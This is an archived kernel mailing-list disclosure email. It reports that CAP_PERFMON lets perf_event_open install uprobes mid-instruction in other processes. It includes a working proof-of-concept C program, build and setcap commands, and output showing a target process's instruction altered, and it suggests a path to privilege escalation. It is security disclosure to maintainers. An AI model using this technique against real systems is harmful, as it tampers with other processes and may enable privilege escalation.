![]() |
|
Message-ID: <CAG48ez1n4520sq0XrWYDHKiKxE_+WCfAK+qt9qkY4ZiBGmL-5g@mail.gmail.com> Date: Tue, 1 Jul 2025 18:14:51 +0200 From: Jann Horn <jannh@...gle.com> To: Serge Hallyn <serge@...lyn.com>, linux-security-module <linux-security-module@...r.kernel.org>, Peter Zijlstra <peterz@...radead.org>, Ingo Molnar <mingo@...hat.com>, Arnaldo Carvalho de Melo <acme@...nel.org>, Namhyung Kim <namhyung@...nel.org>, Mark Rutland <mark.rutland@....com>, Alexander Shishkin <alexander.shishkin@...ux.intel.com>, Jiri Olsa <jolsa@...nel.org>, Ian Rogers <irogers@...gle.com>, Adrian Hunter <adrian.hunter@...el.com>, "Liang, Kan" <kan.liang@...ux.intel.com>, linux-perf-users@...r.kernel.org Cc: Kernel Hardening <kernel-hardening@...ts.openwall.com>, linux-hardening@...r.kernel.org, kernel list <linux-kernel@...r.kernel.org>, Alexey Budankov <alexey.budankov@...ux.intel.com>, James Morris <jamorris@...ux.microsoft.com> Subject: uprobes are destructive but exposed by perf under CAP_PERFMON Since commit c9e0924e5c2b ("perf/core: open access to probes for CAP_PERFMON privileged process"), it is possible to create uprobes through perf_event_open() when the caller has CAP_PERFMON. uprobes can have destructive effects, while my understanding is that CAP_PERFMON is supposed to only let you _read_ stuff (like registers and stack memory) from other processes, but not modify their execution. uprobes (at least on x86) can be destructive because they have no protection against poking in the middle of an instruction; basically as long as the kernel manages to decode the instruction bytes at the caller-specified offset as a relocatable instruction, a breakpoint instruction can be installed at that offset. This means uprobes can be used to alter what happens in another process. It would probably be a good idea to go back to requiring CAP_SYS_ADMIN for installing uprobes, unless we can get to a point where the kernel can prove that the software breakpoint poke cannot break the target process. (Which seems harder than doing it for kprobe, since kprobe can at least rely on symbols to figure out where a function starts...) As a small example, in one terminal: ``` jannh@...n:~/test/perfmon-uprobepoke$ cat target.c #include <unistd.h> #include <stdio.h> __attribute__((noinline)) void bar(unsigned long value) { printf("bar(0x%lx)\n", value); } __attribute__((noinline)) void foo(unsigned long value) { value += 0x90909090; bar(value); } void (*foo_ptr)(unsigned long value) = foo; int main(void) { while (1) { printf("byte 1 of foo(): 0x%hhx\n", ((volatile unsigned char *)(void*)foo)[1]); foo_ptr(0); sleep(1); } } jannh@...n:~/test/perfmon-uprobepoke$ gcc -o target target.c -O3 jannh@...n:~/test/perfmon-uprobepoke$ objdump --disassemble=foo target [...] 00000000000011b0 <foo>: 11b0: b8 90 90 90 90 mov $0x90909090,%eax 11b5: 48 01 c7 add %rax,%rdi 11b8: eb d6 jmp 1190 <bar> [...] jannh@...n:~/test/perfmon-uprobepoke$ ./target byte 1 of foo(): 0x90 bar(0x90909090) byte 1 of foo(): 0x90 bar(0x90909090) byte 1 of foo(): 0x90 bar(0x90909090) byte 1 of foo(): 0x90 bar(0x90909090) ``` and in another terminal: ``` jannh@...n:~/test/perfmon-uprobepoke$ cat poke.c #define _GNU_SOURCE #include <stdio.h> #include <unistd.h> #include <err.h> #include <sys/mman.h> #include <sys/syscall.h> #include <linux/perf_event.h> int main(void) { int uprobe_type; FILE *uprobe_type_file = fopen("/sys/bus/event_source/devices/uprobe/type", "r"); if (uprobe_type_file == NULL) err(1, "fopen uprobe type"); if (fscanf(uprobe_type_file, "%d", &uprobe_type) != 1) errx(1, "read uprobe type"); fclose(uprobe_type_file); printf("uprobe type is %d\n", uprobe_type); unsigned long target_off; FILE *pof = popen("nm target | grep ' foo$' | cut -d' ' -f1", "r"); if (!pof) err(1, "popen nm"); if (fscanf(pof, "%lx", &target_off) != 1) errx(1, "read target offset"); pclose(pof); target_off += 1; printf("will poke at 0x%lx\n", target_off); struct perf_event_attr attr = { .type = uprobe_type, .size = sizeof(struct perf_event_attr), .sample_period = 100000, .sample_type = PERF_SAMPLE_IP, .uprobe_path = (unsigned long)"target", .probe_offset = target_off }; int perf_fd = syscall(__NR_perf_event_open, &attr, -1, 0, -1, 0); if (perf_fd == -1) err(1, "perf_event_open"); char *map = mmap(NULL, 0x11000, PROT_READ, MAP_SHARED, perf_fd, 0); if (map == MAP_FAILED) err(1, "mmap error"); printf("mmap success\n"); while (1) pause(); jannh@...n:~/test/perfmon-uprobepoke$ gcc -o poke poke.c -Wall jannh@...n:~/test/perfmon-uprobepoke$ sudo setcap cap_perfmon+pe poke jannh@...n:~/test/perfmon-uprobepoke$ ./poke uprobe type is 9 will poke at 0x11b1 mmap success ``` This results in the first terminal changing output as follows, showing that 0xcc was written into the middle of the "mov" instruction, modifying its immediate operand: ``` byte 1 of foo(): 0x90 bar(0x90909090) byte 1 of foo(): 0x90 bar(0x90909090) byte 1 of foo(): 0x90 bar(0x90909090) byte 1 of foo(): 0xcc bar(0x909090cc) byte 1 of foo(): 0xcc bar(0x909090cc) ``` It's probably possible to turn this into a privilege escalation by doing things like clobbering part of the distance of a jump or call instruction.
Powered by blists - more mailing lists
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.